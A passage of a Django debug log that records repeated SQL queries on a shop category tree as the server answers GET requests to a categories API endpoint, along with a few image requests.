"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:09:35,991 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:09:35,993 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:09:35] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:09:56,530 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:09:56,539 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:09:56,544 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:09:56,547 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:09:56,551 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:09:56,554 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:09:56,557 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:09:56,560 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:09:56,563 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:09:56,567 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:09:56,571 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:09:56,574 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:09:56,577 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:09:56,580 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:09:56,585 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:09:56,588 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:09:56,591 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:09:56,593 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:09:56,596 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:09:56,600 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:09:56,603 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:09:56,606 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:09:56,609 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:09:56,612 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:09:56,615 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:09:56,619 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:09:56,621 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:09:56,625 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:09:56,629 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:09:56,633 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:09:56,639 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:09:56,643 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:09:56,649 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:09:56,656 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:09:56,660 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:09:56,667 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:09:56,671 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:09:56,675 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:09:56,680 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:09:56,684 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:09:56,689 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:09:56,697 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:09:56,702 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:09:56,707 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:09:56,713 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:09:56,717 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:09:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:09:57] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 14:09:57] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 DEBUG 2019-12-13 14:10:06,369 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:10:06,378 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:10:06,383 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:10:06,386 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:10:06,391 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:10:06,393 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:10:06,397 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:10:06,406 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:10:06,409 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:10:06,412 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 14:10:06,416 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:10:06,418 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:10:06,421 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:10:06,426 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) [13/Dec/2019 14:10:06] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-13 14:10:06,429 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:10:06,432 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:10:06,437 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:10:06,440 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:10:06,443 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 